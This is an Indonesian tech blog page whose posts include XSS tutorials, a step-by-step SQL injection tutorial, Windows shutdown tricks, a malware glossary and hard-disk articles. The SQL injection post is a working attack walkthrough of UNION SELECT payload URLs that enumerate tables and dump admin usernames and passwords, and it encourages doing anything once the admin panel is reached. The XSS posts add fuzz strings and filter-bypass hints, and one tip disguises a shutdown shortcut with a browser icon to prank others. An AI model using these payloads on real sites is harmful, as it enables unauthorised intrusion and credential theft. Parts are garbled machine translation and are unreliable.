MOST HOT TIPS AND TRICK
- Bikin Software Trial Jadi Seumur Hidup

Ouww masa trial software sudah habis.... Pengen cari crack atau keygen nya susah juga apalagi untuk cari Serial Number nya, ehh ternyata ada juga solusi nya untuk mengatasi agar masa trial bisa jadi selamanya alias seumur hidup..
Begini cara nya... Read more >>


- Meningkatkan Kinerja Komputer

Langsung saja tidak usah kelamaan. Beberapa tips meningkatkan kinerja komputer yang mudah-mudahan berguna buat anda. Tips tersebut sebagai berikut :
Begini cara nya... Read more >>


Latest Posts

29 Juli 2011

XSS Injection Tutorial Part ll

:: Menemukan Bug - Dengan Fuzzing::
[EASY] Contoh Kasus - A:

Kami berada di http://buggysite.tld di mana kita melihat "Cari-lapangan" di kanan atas. Karena kita tidak tahu
kode sumber nyata tapi hanya HTML-output dari situs kita harus fuzz apa-apa mana mungkin
untuk mengirimkan data. Dalam beberapa kasus, data akan tercermin di situs tersebut dan dalam beberapa kasus wont. Jika tidak kita beralih ke kue berikutnya, header, mendapatkan / post variabel atau apa pun yang kita fuzzing.

Yang paling efektif untuk bulu adalah untuk tidak menulis: <script> alert (0) </ script> karena banyak situs yang berbeda pencegahan terhadap Cross Site Scripting. Sebaliknya kita menciptakan string kustom yang dalam banyak kasus wont memicu apa pun yang bisa mengubah output dari kesalahan menjadikan situs atau halaman yang tidak rentan.

Contoh string yang efektif yaitu: "kata kunci '/ \> <

" '/ \> Dan < adalah yang paling umum digunakan html karakter yang digunakan dalam Cross Site Scripting. Namun, jika kita ingin menjadi benar-benar teliti maka kita dapat juga menambahkan )(][}{% ke string yang kita gunakan untuk fuzz situs target.

Alasan mengapa tidak ada dua "atau 'adalah karena hal ini dapat memicu WAF, IPS atau apa pun berjaga-jaga situs mungkin telah mencoba untuk melaksanakan terhadap XSS bukan menggunakan skema pengkodean yang aman / rencana / siklus pengembangan. Alasan mengapa semua karakter yang ditulis sebagai> <> adalah karena ini adalah bypass umum terhadap XSS-filter!

Dengan pemikiran, kita menggunakan string berikut: "haxxor '/ \>

Mari kita melihat kembali HTML-code:

 ...
    <input type="text" name="search" value="&quot;haxxor'/\&gt;&lt;" /> <br /> You searched for "haxxor\'/\\>< which returned no results.
    ...  

Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa
ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: ">  
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: ">
read more...

9 Juli 2011

Tuts Modifikasi System Shutdown

Mungkin sobat pada jenuh pada saat mau shutdown pc/ komputer, kali ini kita akan mencoba bagaimana modifikasi system shutdown pada pc / komputer. Baiknya pada system operasi windows XP. Langsung saja pada caranya :

1. Klik Kanan pada Dekstop, kemudian pilih New => shortcut
2. Akan muncul jendela pop up create shortcut, pada tab type the location oh the item, ketikkan : shutdown.exe –s –t 00
 * Keterangan :
a) shutdown.exe(spasi)-s(spasi)-t(spasi)00
b) 00 = waktu tunggu shutdown dalam detik , Jika diisi 20, maka windows akan menunggu selama 20 detik (hitungan mundur)
3. Klik Next jika sudah. Pada jendela berikutnya, berikan nama untuk shortcut. Misal KILL ME PLZ lanjutkan klik tombol Finish
4. Agar tampilan shortcut lebih menarik gantilah icon shortcut, caranya dengan mengklik kanan shortcut, kemudian pilih properties, klik tab shortcut kemudian klik tombol change icon, cari icon yang disukai, klik OK jika sudah.
* Keterangan :
Jika mau isengin temen, bisa ganti Icon Shutdownnya dengan memakai icon Mozilla atau yang lainnya yang sekira nya sering di buka.
 5. Finish


Sekarang bagaimana membuat Pesan saat akan shutdown, begini cara nya :
1. Klik kanan pada desktop, kemudian pilih new => shortcut
2. Pada jendela create shortcut, ketikan shutdown.exe –s –t 10 –c “See U Again Dude…!!”
* Keterangan :
Kata " See U Again Dude...!! " bisa diganti dengan apa yang di sukai.
3. Jika sudah klik Next
4. pada jendela berikutnya, ketikan nama shortcut agan ini
5. Klik Finish Jika sudah 


Bagaimana Cara Shutdown Otomatis? ikuti cara dibawah ini :
1. Klik menu start => Run
2. Pada tab open, ketikan : tsshutdn XX/powerdown
3. Jika sudah klik OK, akan muncul jendela konfirmasi
4. Klik OK pada jendela pop up tersebut
5. Minimize jendela DOS yang muncul ( jendela DOS jangan di-close. Jika di close maka timer tidak akan berjalan )
* Keterangan :
tsshutdn(spasi)XX/powerdown
XX = (waktu yang agan inginkan dalam detik)
Maka dalam waktu 1 jam (3600 detik) computer agan akan dimatikan secara otomatis. 

Cara membuat shortcut Logout, caranya seperti ini :
1. Klik kanan pada Dekstop, kemudian pilih new => shortcut
2. Ketikkan shutdown.exe –l –t 00
3. Langkah selanjutnya sama dengan langkah- langkah agan membuat shortcut untuk shutdown.

Cara membuat shortcut Shutdown, caranya :
1. Kli kanan pada Dekstop, kemudian pilih new => shortcut
2. Ketikan shutdown.exe –r –t 00 pada jendela create shortcut
3. Langkah selanjutnya sama dengan langkah-langkah anda membuat shortcut untuk shutdown dan log ou.
 
Mematikan Service Secara Cepat, caranya :
1. Masuklah ke registry editor dengan mengetikkan regedit pada menu Run
2. Carilah key ini HKEY_LOCAL_MACHINE => SYSTEM => controlset001 => Control
3. Lihat pada jendela sebelah kanan, disana agan akan menemukan string waittokillservicetime . Klik ganda string tersebut, sehingga akan muncul jendela edit string, pada tab value data, ubah angkanya menjadi 3000 (3 detik)
4. Klik OK, dan Restart Komputer Anda
Untuk selanjutnya windows tidak akan menunggu lama untuk mematikan secara paksa service yang tidak dapat dimatikan oleh windows saat shutdown. Windows cukup menunggu 3 detik setelah itu service tersebut akan segera dimatikan secara paksa

Menutup Program Lebih Cepat, tutorialnya :
1. Masuklah ke registry editor dengan mengetikan regedit pada menu Run
2. Cari key berikut ini HKEY_CURRENT_USER => Control Panel => Dekstop
3. Lihat pada jendela sebelah kanan dan carilah string waittokillapptimeout jika sudah ketemu klik ganda string tersebut
4. Akan muncul jendela pop up string edit. Pada tab value data, ubah angkanya menjadi 5000 (5 detik) atau 3000 (3 detik), klik OK jika sudah
5. Setelah itu pada jendela yang sama carila string autoendtask, klik ganda string tersebut jika sudah ketemu.
6. Akan muncul jendela edit string, pada tab value data, ubah nilainya dari 0 menjadi 1
7. Restart computer.
Kini windows anda akan segera menutup program dengan segera tanpa harus menunggu begitu lama. 


 



 
read more...

13 Juni 2011

Kenali Apa Itu Spyware, Trojjan, Worm DLL

SEPUTAR VIRUS, SPYWARE, MALWARE, SPAM DAN SEJENISNYA


Worm

Worm dapat disebut juga cacing. Jika virus bersarang pada suatu program atau dokumen, cacing-cacing ini tidak demikian. Worm adalah sebuah program yang berdiri sendiri dan tidak membutuhkan sarang untuk menyebarkan diri. Hebatnya lagi, Worm bisa saja tidak memerlukan bantuan orang untuk penyebarannya. Melalui jaringan, cacing bisa “bertelur” di komputer-komputer yang terhubung dalam satu jaringan. Ia masuk dari suatu kerapuhan (vulerability) dari suatu sistem, biasanya sistem operasi. Setelah masuk ke dalam suatu komputer, worm memodifikasi beberapa pengaturan di sistem operasi agar tetap hidup. Minimal, ia memasukkan diri dalam proses boot suatu komputer. Lainnya mungkin mematikan akses ke situs antivirus, menonaktifkan fitur keamanan di sistem, dan tindakan lain.

Wabbit

Istilah ini mungkin asing, tetapi memang ada Malware tipe ini. Seperti worm, wabbit tidak membutuhkan suatu program dan dokumen untuk bersarang. Tetapi berbeda dengan worm yang menyebarkan diri ke komputer lain menggunakan jaringan, wabbit menggandakan diri secara terus menerus di dalam sebuah komputer lokal dan hasil penggandaan itu akan menggerogoti sistem. Kinerja komputer akan melambat karena wabbit memakan sumber daya yang lumayan banyak. Selain sumber daya itu, wabbit bisa diprogram untuk memiliki efek samping yang efeknya mirip dengan Malware lain. Kombinasi-kombinasi Malware seperti inilah yang bisa sangat berbahaya.

Keylogger

Keylogger adalah suatu perangkat lunak yang mencatat semua tekanan tombol keyboard. Catatan yang disimpan dalam suatu file yang bisa dilihat kemudian hari secara lengkap. Di dalamnya bisa terdapat informasi seperti aplikasi tempat penekanan tombol dilakukan dan waktu penekanan. Dengan cara ini, seseorang bisa mengetahui username, password, dan berbagai informasi lain yang dimasukkan dengan cara pengetikan. Pada tingkat yang lebih canggih, keylogger mengirimkan log yang biasanya berupa file teks itu ke seseorang. Tentu saja itu dilakukan tanpa sepengetahuan si korban. Pada tingkat ini pula keylogger bisa mengaktifkan diri ketika pengguna komputer melakukan tindakan tertentu. Misalnya ketika pengguna komputer membuka situs e-Banking, keylogger aktif dan mencatat semua tekanan pada keyboard di situs itu dengan harapan nomor PIN dapat dicatat. Keylogger ini cukup berbahaya karena secanggih apapun enkripsi yang diterapkan oleh suatu website, password tetap dapat diambil. Pasalnya, password itu diambil sebelum sempat dienkripsi oleh sistem. Jadi, keylogger merekam sesaat setelah password diketikkan dan belum diproses oleh sistem.

Browser Hijacker

Browser Hijacker mengarahkan browser yang seharusnya menampilkan situs yang sesuai dengan alamat tetapi dimasukkan ke situs lain. Itu contoh yang paling parah yang disebabkan oleh browser hijacker. Contoh lain yang bisa dilakukan oleh pembajak ini adalah menambahkan bookmark, mengganti homepage, serta mengubah pengaturan browser. Bicara mengenai browser disini boleh yakin 100% browser yang dibicarakan adalah Internet Explorer. Selain karena Internet Explorer adalah buatan Microsoft, raksasa penghasill perangkat lunak yang produknya sering dijadikan sasaran serangan cracker, Internet Explorer telah menyatu dengan Windows, sistem operasi milik Microsoft yang juga banyak diserbu oleh cracker.

Trojjan

Troya adalah istilah yang digunakan untuk Malware yang seolah-olah merupakan program yang berguna, yang menghibur, dan yang menyelamatkan, padahal di balik itu ia merusak. Troya ini bisa ditunggangi oleh Malware lain seperti virus, worm, spyware. Troya dapat digunakan untuk menyebarkan atau mengaktifkan mereka. Bisa saja suatu program dibuat seolah-olah adalah antivirus gratis. Memang program itu menghapus suatu virus, tapi ternyata selain itu, ia juga memasukkan virus lain ke dalam komputer. Bedanya dengan virus dan worm, troya tidak dapat menggandakan diri. Tapi virus atau worm yang “nebeng” di dalamnya bisa.

Spyware

Spyware adalah perangkat lunak yang megumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu. Informasinya bisa yang tidak tertalu berbahaya seperti pola berkomputer, terutama berinternet seseorang, sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking), dan password suatu akun. Informasi tentang pola berinternet tidak terlalu berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware. Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerapkali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya, suatu situs berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.

Backdoor

Dengan cara melanggar prosedur, Malware berusaha masuk ke dalam sistem untuk mengakses sumber daya serta file. Berdasarkan cara bekerja dan dan perilaku penyebarannya, backdoor dapat dibagi menjadi 2 grup. Grup pertama mirip dengan troya. Mereka secara manual dimasukkan ke dalam suatu file program pada perangkat lunak dan kemudian ketika perangkat lunak itu diinstall, mereka menyebar. Grup yang kedua mirip dengan worm. Backdoor dalam grup ini dijalankan sebagai bagian dari proses boot. Ratware adalah sebutan untuk backdoor yang mengubah komputer menjadi zombi yang mengirim spam. Backdoor lain mampu mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack password dan enkripasi, dan mendistribusikan serangan distributed denial of service (DDoS).

Dialer

Jika komputer yang digunakan tiba-tiba berusaha menghubungkan diri ke Internet, padahal tidak ada satupun perangkat lunak yang dijalankan membutuhkan koneksi, maka kemungkinan komputer telah terjangkit oleh Malware yang terkenal dengan istilah dialer. Apalagi karena dialer kadang mengganti nomor penyedia layanan internet yang biasa dihubungi dengan nomor penyedia internet lain yang biasanya nomor jarak jauh (seringkali nomor luar negeri), akibatnya tagihan telepon menjadi melonjak tak terkira. Dialer menghubungkan komputer ke internet guna mengirimkan informasi yang didapat oleh keylogger, spyware, atau Malware lain ke seseorang yang memang bertujuan demikian. Dia dan penyedia jasa teleponlah yang paling diuntungkan dengan dialer ini.


Spam

Description: Description: dialer-kaspersky-corporateSpam adalah mengirimkan pesan/iklan/dll dalam jumlah besar ke banyak penerima. Spam bisa juga dalam bentuk SMS, bentuk berita atau pesan yg dikirim berulang-ulang tanpa tujuan jelas dan tanpa persetujuan yg menerimannya.


Ok segitu saja dulu sekira nya bisa menambah wawasan..
read more...

15 Januari 2011

XSS Injection Tutorial Part l

:: Pendahuluan::
Apa itu XSS dan apa yang mengacu kepada

Alias XSS Cross Site Scripting adalah sisi klien serangan di mana seorang penyerang menciptakan link jahat,script berisi kode yang kemudian dilaksanakan dalam browser korban. Kode script bisa bahasa apapun yang didukung oleh browser, tetapi sebagian besar HTML dan Javascript yang digunakan bersama dengan embedded Flash, Java atau ActiveX.

Apa yang bisa Cross Site Scripting digunakan untuk?
Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan, browser serangan, phishing, propaganda dan bahkan cacing! Namun masih memerlukan korban untuk mengklik link jahat diciptakan oleh penyerang.

Bagaimana bisa Satu mendapatkan korban untuk mengklik link XSS?
Cara termudah untuk membuat orang meng-klik link berbahaya adalah untuk membuat mereka terlihat otentik dan non - jahat. Memberi mereka alasan kemudian adalah rekayasa sosial-bagian yang harus mudah kecuali jika korban sadar serangan tersebut dan / atau memiliki tindakan terhadap Cross Site Scripting, seperti NoScript.

Bagaimana Satu menghindari XSS-links tampak mencurigakan?
Hal ini biasanya dilakukan dengan penyandian, layanan url pendek, mengarahkan dan bahkan flash!

Yang tipe Cross Site Scripting yang ada?
Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site Scripting juga bisa
dipicu melalui cookie. Beberapa individu mengklaim bahwa XSS juga dapat dibagi menjadi gigih dan
non-persistent tetapi juga jenis-jenis dan harus disebut sebagai injeksi yang berbeda kelas bug / kerentanan.

Apa perbedaan antara GET-POST-XSS?
Perbedaannya adalah bahwa ketika GET-variabel yang digunakan adalah mungkin untuk melakukan serangan XSS normal mana penyerang mengirimkan crafted URL jahat kepada korban yang kemudian dijalankan ketika
korban membuka link dalam browser.

Dengan variabel POST-penyerang dapat f.ex. menggunakan flash untuk mengirim korban ke POST-XSS
situs rentan karena tidak mungkin untuk membuat URL ketika POST-variabel yang sedang digunakan.

Apakah ada sub-kategori dari Cross Site Scripting?
Pada saat ada XSSR dan XSSQLI. Orang bisa mengatakan bahwa XSRF / CSRF milik yang sama
kategori, namun metode serangan terlalu banyak berbeda dari tradisional Cross Site Scripting. CSSR alias XSSR atau Cross Site Redirection Script digunakan untuk mengarahkan korban kepada halaman lain enggan. Halaman bisa misalnya berisi phishing template, kode serangan browser atau beberapa kasus di mana data atau skema URI javascript digunakan: sesi-pembajakan. XSSQLI adalah campuran Cross Site Scripting dan SQL Injection, di mana korban ketidaktahuan mengklik link berbahaya.
SQL Injection berisi instruksi untuk suatu daerah di website yang membutuhkan hak istimewa yang
tamu atau anggota tidak memiliki. XSRF atau CSRF (kadang-kadang disebut sebagai C-Surf) berdiri untuk
Cross Site Request Pemalsuan yang digunakan untuk mengirim masukan dari pihak ke-3 situs ke situs target.
XSRF dapat dalam beberapa kasus dipicu hanya dengan melihat gambar yang dirancang khusus tetapi yang paling sering digunakan adalah URL. Dengan Cross Site Request Pemalsuan itu mungkin untuk f.ex. mengubah
password korban jika situs target tidak diamankan dengan baik dengan bukti dll

Apa itu XST dan dapat digunakan untuk apa saja?
XST juga dikenal sebagai Cross Site (Script) Tracing adalah suatu cara untuk menyalahgunakan HTTP Trace (Debug) protokol. Apa pun yang seorang penyerang mengirimkan ke web-server yang telah diaktifkan akan mengirim TRACE jawaban yang sama kembali. Jika penyerang mengirimkan berikut:

TRACE / HTTP/1.0
    Host: target.tld
    Custom-header: <script>alert(0)</script>

Maka penyerang akan menerima sama "Custom-header:
Namun setelah update browser terbaru tahun berikutnya (s) XST telah semakin sulit untuk
DNS dan berfungsi dengan benar.

Bagaimana mungkin menemukan bug XSS dalam website?
Ada 2 metode: kode / script audit atau fuzzing yang digambarkan di bawah ini.

Alat macam apa yang diperlukan untuk menemukan bug XSS? (REQ = Required, OPT = Optional)
- REQ: Internet Browser (seperti FireFox) dalam kasus Anda fuzzing.
- REQ:-penampil teks (seperti notepad) dalam kasus Anda audit.
- KPT: Sebuah proxy mencegat dalam kasus yang sedang Anda lakukan lebih maju XSS. (Dalam FireFox adalah mungkin untuk menggunakan Tamper Data).
- KPT: Browser Addons, untuk FireFox berikut ini adalah terutama bermanfaat: pembakar, JSView dan LiveHTTP Header.

Apa lagi yang berguna untuk mengetahui apakah Kita ingin menemukan bug XSS?
- Browser keterbatasan mengenai Cross Site Scripting [1]
- HTTP Headers dan bagaimana protokol HTTP bekerja.
- HTML + Javascript dan mungkin tertanam serangan script. (flash dll)
- Mencegat proxy (Burp dll), alat diferensial (berbaur, ExamDiff, dll)
- Useful browser-addons (lihat FireCat [3])
- Website scanner (Nikto, W3AF, Grendel, Directory-fuzzers dll)

Mana-bug XSS biasanya terletak?
Hal ini biasanya terletak di masukan pengguna yang diajukan baik melalui GET atau POST variabel, dimana hal itu tercermin pada situs target sebagai teks di luar tag, tag di dalam nilai-nilai atau dalam javascript. Dapat juga dalam beberapa kasus disampaikan melalui cookie, http header atau dalam kasus-kasus yang jarang upload.

Bagaimana Satu melindungi sebuah situs terhadap XSS?
Cara terbaik adalah untuk memastikan bahwa semua pengguna input dan output divalidasi dengan benar. Namun dalam beberapa kasus WAF yang IPS atau juga dapat melindungi terhadap XSS meskipun masih cara terbaik untuk memvalidasi input pengguna-dan-output dengan benar.


Continue :
read more...

SQL injection Tutorial

Lama juga ga mainan blog, mungkin ini sudah usang tutorial nya bahkan untuk yang udah master bisa muntah baca ini tutorial. tapi bagaimanapun untuk yang mau belajar bisa di ikuti ini tutorial. Langsung aja ya.

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=Step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
Sehingga muncul pesan error.

==========
=Step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

check-lah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=Step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=Step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=Step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= Step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

ASCII

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=Step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= Step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Kalo sudah ketemu Halaman Admin / Cpanel nya terserah deh mau di apain..
read more...

13 Februari 2010

Perkembangan Harddisk saat ini

Trend Perkembangan HardDisk

Trend perkembangan harddisk dapat kita amati dari beberapa karakteristik berikut :

1. Kerapatan Data/Teknologi Bahan
Merupakan ukuran teknologi bahan yang digunakan seberapa besar bit data yang mampu disimpan dalam satu satuan persegi. Dalam hal kerapatan data dari awal sampai sekarang terjadi evolusi yang sangat kontras. Pada awal perkembangannya kerapannya sekitar 0.004 Gbits/in2 tetapi pada tahun 1999 labortorium IBM sudah ada sekitar 35.3 Gbits/in2. Tetapi menurut bizpaceinfo akan diperkenalkan apa yang dinamakan TerraBit density. Harddisk pada awal perkembangannya, bahan yang digunakan sebagai media penyimpan adalah iron oxide. Tetapi sekarang banyak digunakan media thin film. Media ini merupakan media yang lebih banyak menyimpan data dari pada iron oxide pada luasan yang sama dan juga sifatnya yang lebih awet.

2. Struktur head baca/tulis
Head baca/ tulis merupakan perantara antara media fisik dengan data elektronik. Lewat head ini data ditulis ke medium fisik atau dibaca dari medium fisik. Head akan mengubah data bit menjadi pulsa magnetik dan menuliskannya ke medium fisik. Pada proses pembacaan data prosesnya merupakan kebalikannya.

Proses baca tulis data merupakan hal yang sangat penting, oleh karena itu mekanismenya juga perlu diperhatikan. Dalam pendahuluan sebelumnya terdapat perbedaan letak fisik head dalam operasinya. Dulu head bersentuhan fisik dengan metal penyimpan. Kini antara head dan metal penyimpan sudah diberi jarak. Bila head bersentuhan dengan metal penyimpan, hal ini akan menyebabkan kerusakan permanen fisik, head yang aus, tentu saja panas akibat gesekan. Apalagi teknologi sekarang kecepatan putar harddisk sudah sangat cepat. Selain itu teknologi head harddiskpun juga mengalami evolusi. Evolusi head baca/tulis harddisk : Ferrite head, Metal-In-Gap (MIG) head, Thin Film (TF) Head, (Anisotropic) Magnetoresistive (MR/AMR) Heads, Giant Magnetoresistive (GMR) Heads dan sekarang yang digunakan adalah Colossal Magnetoresistive (CMR) Heads. Ferrite head, merupakan teknologi head yang paling kuno, terbuat dari inti besi yang berbentuk huruf U dan dibungkus oleh lilitan elektromagnetis. Teknologi ini diimplementasikan pada pertengahan tahun 1980 pada harddisk Seagate ST-251. Kebanyakan terdapat pada harddisk yang ukurannya kurang dari 50MB. Metal-In-Gap (MIG), merupakan penyempurnaan dari head Ferrite. Biasanya digunakan pada harddisk yang ukurannya 50MB sampai dengan 100MB. Thin Film (TF) heads, berbeda jauh dengan jenis head sebelumnya. Head ini dibuat dengan proses photolothografi seperti yang digunakan pada pembuatan prosessor. (Anisotropic) Magnetoresistive (MR/AMR) Heads, head ini digunakan untuk membaca saja. Untuk penulisannya digunakan head jenis Thin Film. Diimplementasikan pada harddisk ukuran 1GB sampai dengan 30GB. Giant Magnetoresistive (GMR) Heads, merupakan penemuan dari peneliti Eropa Peter Gruenberg and Albert Fert. Digunakan pada harddisk ukuran besar seperti 75GB dan kerapatan tinggi sekitar 10 Gbits/in2 sampai dengan 15 Gbits/in2.

Karena teknologi Giant Magnetoresistive (GMR) mulai ditarik dari pasaran, sebagai penggantinya adalah Colossal Magnetoresistive (CMR).

Kecepatan putar pada jaman awal sekitar 3600RPM. Dengan semakin berkembangnya teknologi, kecepatan putar ditingkatkan menjadi 4500RPM dan 5400RPM. Karena kebutuhan media penyimpan yang mempunyai kemampuan tinggi dibuatlah dengan kecepatan 7200RPM yang digunakan pada harddisk SCSI.

3. Kapasitas
Kapasitas harddisk pada saat ini sudah mencapai orde ratusan GB. Hal ini dikarenakan teknologi bahan yang semakin baik, kerapatan data yang semakin tinggi. Teknologi dari Western Digital saat ini telah mampu membuat harddisk 200GB dengan kecepatan 7200RPM. Sedangkan Maxtor dengan Maxtor MaxLine II-nya yaitu harddisk berukuran 300GB dengan kecepatan 5400RPM. Beriringan dengan transisi ke ukuran harddisk yang lebih kecil dan kapasitas yang semakin besar terjadi penurunan dramatik dalam harga per megabyte penyimpanan, membuat hardisk kapasitas besar tercapai harganya oleh para pemakai komputer biasa. hd4.jpg Gambar 3 Sistem kontrol head Pada tiap piringan penyimpan terdapat satu head. Untuk menjangkau tengah pinggir piringan digunakan sliders sebagai perantaranya.

Teknologi Harddisk masa-depan

Harddisk dimasa mendatang salah satunya dititik beratkan pada kecepatan akses dan kapasitasnya. Hal ini dapat dilakukan dengan mereduksi komponen mekanis dari fisik harddisknya. Komponen mekanis yang tidak mampu bekerja pada frekuensi tinggi digeser dengan komponen yang bersifat elektris yang mampu bekerja dalam orde MHz bahkan GHz.

Dapat dilihat saat ini sudah dirilis berbagai macam media penyimpan elektronis dalam bentuk kecil. Misalnya USB Drive dan MultiMedia Card. Bila nantinya teknologi ini diterapkan dan dapat harganya terjangkau, kemampuan komputer dari sisi kecepatan akses baca/tulis media penyimpan akan meningkat pesat. Otomatis kemampuan PC Server untuk melayani request dari client akan meningkat.

Moga bermanfaat..
read more...

12 Februari 2010

Apa dan langkah atasi bad-sector pada harddisk | TIPS

Apakah Bad-Sector?? pernah terbersit di benak kalian mungkin atau malah mengalaminya? mari di artikel ini membahas apa itu bad-sector.
Bad sector kalau di Indonesia-kan berarti sektor rusak- adalah salah satu musuh besar harddisk. Ibaratnya Anda adalah pengusaha hotel dan hotel itu kita umpamakan sebagai harddisk kita, maka sektor-sektor ini bisa kita umpamakan sebagai kamar hotel yang bisa menampung para tamu hotel (file) yang menginap (disimpan). Kita punya 100 kamar, lalu karena kurangnya perawatan kita, salah satu kamar hotel kita (sektor) rusak. Bukankah hasil yang diberikan oleh 99 buah kamar lebih sedikit dari hasil 100 kamar? Celakanya lagi, kamar rusak (bad sector) ini bisa merambat ke seluruh kamar lain di hotel itu. Bagaimana kalau ke 100 kamar hotel kita rusak? Seperti itulah kira kira sektor-sektor pada harddisk. Didalam sektor ini kita file-file kita ditempatkan. Apakah itu MP3, JPG, DOC, dan lain-lain. Jumlah sektor pada harddisk tergantung dari ukuran harddisk itu sendiri (untuk mengetahuinya Anda bisa lihat di keterangan produk harddisk atau masuk ke setup BIOS dan jalankan Autodetect harddisk). Walaupun jumlah sektor harddisk bisa berbeda-beda, tapi kalau mereka telah terkena bad sector:

ATASI SEGERA! KENAPA BISA TIMBUL?

Sekarang kita akan bahas lebih lanjut mengenai bad sector, agar kita tidak hanya memandang harddisk dari segi kapasitas, kecepatan transfer data, RPM, atau interface-nya saja. Bad sector bisa timbul karena beberapa faktor. Faktor-faktor tersebut antara lain misalnya adalah:

1.Improperly Shut Down

Mematikan komputer tanpa prosedur shutdown dengan normal akan berpengaruh pada harddisk, karena tujuan dari prosedur shutdown itu sendiri adalah untuk mengamankan posisi head dari piringan harddisk agar tidak bergesekan (atau bisa juga diistilahkan dengan parkir harddisk). Anda bisa bayangkan ketika harddisk yang sedang berputar dengan kecepatan 7200 rpm lalu komputernya dimatikan, maka bisa timbul kemungkinan head dan piringan magnetis harddisk bergesekan dengan tidak normal. Improperly shut down bisa terjadi karena kita mematikan PC tanpa mengikuti prosedur shutdown atau bisa juga karena menekan tombol reset. Di samping itu bagi Anda yang tidak menggunakan UPS atau stabilizer, listrik yang tiba-tiba padam atau tegangan (voltase) yang tidak stabil merupakan faktor penyebab yang lebih parah.

2.File

Dalam beberapa kasus, file berpotensi juga menyebabkan bad sector, contohnya file yang corrupt dan rusak, atau penginstalasian program yang salah.


MENGATASI BAD SECTOR

Setelah kita tahu penyebabnya, untuk mengatasi bad sector tadi ada beberapa alternatif yang bisa kita gunakan.

1.Software Utility Harddisk.

